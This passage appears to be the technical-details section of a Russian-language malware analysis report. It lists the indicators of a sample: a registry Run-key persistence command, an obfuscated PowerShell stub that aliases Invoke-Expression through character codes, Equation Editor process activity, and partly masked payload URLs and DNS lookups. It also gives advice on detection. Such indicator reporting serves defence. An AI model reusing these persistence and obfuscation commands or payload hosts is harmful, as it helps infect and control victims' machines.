Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\vbc.vbs ' (пустое имя '' обозначает параметр по умолчанию этого ключа; значение записано с пробелом в конце)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\vbc.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\vbc.vbs '
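- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$hddgdgd6635e5664646464jgjgh=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,10...
  (Примечание: [char]73, [char]69 и [char]88 дают строку «IEX», поэтому `sal K` создаёт псевдоним K для Invoke-Expression. Видимая часть массива кодов ASCII раскодируется в `$Tbone='*EX'.replace('*','I');sa`, дальше строка на странице обрезана. Имя команды в открытом виде в командной строке не встречается, поэтому для обнаружения надёжнее журналирование блоков сценариев PowerShell (Script Block Logging), чем поиск подстроки «IEX» в аргументах процесса.)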
- %WINDIR%\syswow64\calc.exe
- %APPDATA%\vbc.vbs
- %APPDATA%\logsm.dat
- %APPDATA%\logsm.dat
- http://gg.gg/gq58c
- http://th####edycenter.com/nova/nova.vbs
- http://th####edycenter.com/nova2/Attack.jpg
- DNS ASK gg.gg
- DNS ASK th####edycenter.com
- DNS ASK re####.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$hddgdgd6635e5664646464jgjgh=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,10... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\vbc.vbs ' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\calc.exe'